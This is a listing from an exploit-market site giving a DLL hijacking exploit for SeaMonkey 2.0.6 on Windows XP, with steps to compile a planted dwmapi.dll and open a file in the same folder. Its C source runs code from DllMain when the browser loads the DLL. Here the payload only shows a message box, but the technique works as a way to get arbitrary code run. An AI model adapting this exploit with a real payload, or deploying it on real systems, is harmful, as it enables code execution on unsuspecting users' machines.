[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SeaMonkey DLL Hijacking (dwmapi.dll) Exploit

Author
secuid0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14038
Category
local exploits
Date add
08-09-2010
Platform
windows
============================================
SeaMonkey DLL Hijacking (dwmapi.dll) Exploit
============================================

/*
Exploit Title: SeaMonkey DLL Hijacking Exploit (dwmapi.dll)
Date: 07/09/2010
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Software Version: SeaMonkey 2.0.6
Vendor Site: http://www.seamonkey-project.org/
Vulnerable Extensions: html, xml, txt, jpg (and probably more)
Tested Under: winxp_sp3.080413-2111

Instructions: 
1. Compile the following code
2. Create a file of the affected extensions in the same directory as the dll
3. Execute file.<extension>
*/

#define DllExport __declspec (dllexport)
int m0nk()
{
  MessageBox(0, "SeaMonkey 2.0.6 is vulnerable to DLL Hijacking", "secuid0", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
			HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
			{m0nk();}



#  0day.today [2024-11-15]  #